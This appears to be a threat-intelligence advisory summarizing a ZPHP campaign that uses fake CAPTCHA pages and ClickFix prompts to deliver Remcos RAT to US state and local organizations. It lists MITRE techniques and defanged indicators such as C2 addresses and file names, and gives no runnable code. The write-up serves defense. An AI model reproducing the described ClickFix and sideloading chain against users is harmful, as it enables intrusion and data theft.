Threat Research

ZPHP Campaign Delivering Remcos RAT Impacting SLTTs

cisecurity
ZPHP Campaign Delivering Remcos RAT Impacting SLTTs

CIS CTI identified an ongoing ZPHP (SmartApeSG) campaign targeting U.S. SLTT organizations that uses fake CAPTCHAs and the ClickFix social engineering technique to deliver remote access tools, including Remcos RAT. The campaign’s kill chain leverages injected JavaScript (middleware-render.js), mshta/PowerShell execution, DLL sideloading, steganography, and persistence named “Intel PLLQ Components,” and is assessed likely to continue affecting SLTTs in 2026. #ZPHP #Remcos

Keypoints

  • Threat actors inject malicious JavaScript (middleware-render.js) into compromised Node.js sites and replace page content with a fake Cloudflare Turnstile CAPTCHA to coerce users into running commands (ClickFix).
  • ClickFix social engineering instructs victims to open the Run dialog and paste a clipboard command that launches mshta.exe, which then executes an HTA and a hidden PowerShell script to download a ZIP payload.
  • The final payload is a large ZIP (saved to AppDataLocal as a .pdf-named file), containing over 90 files with Remcos RAT hidden via steganography and delivered through DLL sideloading (mega_altpllq.exe + ActionCenterHelper.dll).
  • Remcos establishes persistence via a scheduled task and a Run registry key both named “Intel PLLQ Components,” beacons to C2 over HTTPS with a self-signed certificate, and provides full remote control capabilities (keylogging, screen/webcam capture, data theft).
  • CIS detections and network telemetry show broad impact: multiple SLTT alerts in Feb 2026, 61 ZPHP alerts in CIS Albert IDS at start of 2026, and ~500,000 blocked DNS requests tied to the campaign across 162 MS-ISAC member organizations.
  • CIS CTI assesses ClickFix variants are likely to be reused and scaled across SLTT targets throughout 2026 due to ease of implementation and fast compromise potential; MS-ISAC/CIS sharing provided hundreds of IOCs to members.

MITRE Techniques

  • [T1204 ] User Execution – Social engineering coerced users to run a clipboard-injected command from the Run dialog to start the kill chain (‘socially engineering the victim to run a command on their machine’)
  • [T1497.001 ] Virtualization/Sandbox Evasion: System Checks – The script checks for notepad.exe and other conditions to avoid virtualized analysis (‘environment verification step that checks for the existence of notepad.exe in the System32 directory before executing mshta.exe’)
  • [T1218.005 ] Mshta (Signed Binary Proxy Execution) – mshta.exe is used to execute the HTA that constructs and launches a hidden PowerShell payload (‘before executing mshta.exe’ and HTA file named “rate” would be executed by mshta.exe)
  • [T1059.001 ] PowerShell – The HTA constructs and runs a hidden PowerShell script that downloads and extracts the ZIP payload (‘constructs a PowerShell script that runs in a hidden command prompt’)
  • [T1574.001 ] DLL Side-Loading – The final delivery uses a legitimate-looking executable to sideload a malicious ActionCenterHelper.dll which loads the encrypted Remcos payload (‘Mega_altpllq.exe is the primary executable and the trigger for DLL sideloading, while ActionCenterHelper.dll is a maliciously sideloaded DLL’)
  • [T1055 ] Process Injection – The malicious sideloaded DLL decrypts the Remcos payload in memory and injects it into a process (‘decrypt it in memory, and inject it’)
  • [T1053.005 ] Scheduled Task/Job – Remcos establishes persistence via a scheduled task named to mimic legitimate software (‘establishes persistence through a scheduled task and a Windows registry Run key, both named Intel PLLQ Components’)
  • [T1547.001 ] Registry Run Keys/Startup Folder – Persistence is also achieved through a Run registry key named to resemble Intel components (‘establishes persistence through a scheduled task and a Windows registry Run key, both named Intel PLLQ Components’)
  • [T1027.005 ] Steganography – The Remcos RAT is concealed within many legitimate-looking files inside the ZIP archive using steganography (‘Remcos RAT hidden via steganography among the over 90 files’)
  • [T1071.001 ] Application Layer Protocol: Web Protocols (HTTPS) – Remcos beacons and C2 communications occur over HTTPS using a self-signed certificate (‘beacons to its C2 server over HTTPs using a self-signed certificate’)

Indicators of Compromise

  • [IP Address ] C2 and hosting infrastructure – 193.42.38[.]42 (served /limit and hosted HTA/ZIP), 192.144.56[.]80:443 (observed Remcos C2)
  • [File Name ] Malicious JavaScript and stages – middleware-render.js (injected JS), rate.hta (next-stage HTA), and files like mega_altpllq.exe, ActionCenterHelper.dll, autohealth.dat
  • [File Path ] Download/extraction location – C:Users[username]AppDataLocal[Random6DigitString].pdf (ZIP saved with PDF extension before extraction)
  • [URL/Download ] Download endpoints – hxxp://193.42.38[.]42/limit (ZIP download location referenced by PowerShell)
  • [Registry/Task Name ] Persistence indicators – “Intel PLLQ Components” (name used for both scheduled task and Run registry key)

Read more: https://www.cisecurity.org/insights/blog/zphp-campaign-delivering-remcos-rat-impacting-sltts

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint